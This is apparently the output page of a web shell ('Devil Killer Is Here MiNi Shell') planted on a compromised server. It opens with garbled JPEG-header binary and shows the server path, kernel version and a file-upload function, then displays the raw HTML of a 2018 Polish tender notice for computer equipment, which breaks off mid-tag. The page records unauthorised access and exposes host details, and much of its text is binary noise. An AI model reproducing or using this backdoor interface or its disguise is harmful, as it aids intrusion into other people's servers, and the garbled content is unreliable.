JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20181003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20181003/631050-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 631050-N-2018 z dnia 2018-10-03 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Instytut Ogrodnictwa</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa sprzętu komputerowego III</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie nieobowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Zamówienie jest współfinansowane z różnych środków Unii Europejskiej.</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Tak</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl">Adw. Jerzy Pieróg PIERÓG & Partnerzy Kancelaria Prawna, ul. Wspólna 50 lok. 6,00-684 Warszawa</span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Instytut Ogrodnictwa</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">101023342</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Konstytucji 3 Maja</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1/3</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">96-100</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Skierniewice</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">łódzkie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">+48468332021</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zamowienia.publiczne@inhort.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">+48468333228</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.inhort.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Instytut badawczy</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.pierog.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.pierog.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Wymagane jest złożenie oferty w formie pisemnej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">PIERÓG & Partnerzy Kancelaria Prawna, ul. Wspólna 50 lok. 6, 00-684 Warszawa</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa sprzętu komputerowego III</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">28/ZP/2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci">Zamawiający nie zastrzega</span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">Wszystkie części</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem zamówienia jest dostawa sprzętu komputerowego. Szczegółowy opis przedmiotu zamówienia wraz z podziałem na części został zawarty:1)	w odniesieniu do I części zamówienia - w załączniku nr 1.1 do SIWZ;2)	w odniesieniu do II części zamówienia - w załączniku nr 1.2 do SIWZ;3)	w odniesieniu do III części zamówienia - w załączniku nr 1.3 do SIWZ;</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">30200000-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30210000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30213300-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30213100-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30216110-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>42962000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30213200-7</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">30</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Zamówienie zostanie zrealizowane w terminie zgodnym z oświadczeniem zawartym w ofercie Wykonawcy, nie dłuższym niż: 30 dni. Przy czym termin realizacji powinien być wskazany w dniach (nie w godzinach, dobach itp.) i być nie krótszy niż 3 dni. </span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Przed udzieleniem zamówienia Zamawiający może wezwać Wykonawcę, którego oferta zostanie najwyżej oceniona, do przedłożenia w wyznaczonym, nie krótszym niż 5 dni terminie:1)	w zakresie potwierdzającym, iż oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego:a)	w części zamówienia nr 1:- dokumentu potwierdzającego osiągnięcie przez zaoferowane procesory minimalnej liczby punktów w teście PassMark - CPU Mark, która została określona w załączniku nr 1.1 do SIWZ.Dokumenty należy złożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem. b)	w części zamówienia nr 2:- dokumentu potwierdzającego osiągnięcie przez zaoferowane procesory minimalnej liczby punktów w teście PassMark - CPU Mark, która została określona w załączniku nr 1.2 do SIWZ.Dokumenty należy złożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem. </span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Wraz z formularzem oferty, Wykonawca zobowiązany jest złożyć dokument, z którego wynika zakres umocowania do dokonania czynności złożenia oferty, oświadczeń lub dokumentów w przypadku, gdy Wykonawca powierzył wykonanie tych czynności pełnomocnikowi lub w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dokument musi zostać złożony w formie oryginału lub kopii poświadczonej za zgodność z oryginałem, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu. W celu wykazania braku podstaw wykluczenia, w terminie 3 dni od zamieszczenia na stronie internetowej www.pierog.pl informacji, o której mowa w art. 86 ust. 5 ustawy, Wykonawca przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy, sporządzone według wzoru stanowiącego załącznik nr 4 do SIWZ. Oświadczenie należy złożyć w oryginale.W przypadku przynależności do tej samej grupy kapitałowej Wykonawcą może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. Wykonawca nieprzynależący do żadnej grupy kapitałowej, może złożyć oświadczenie wraz z ofertą.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span 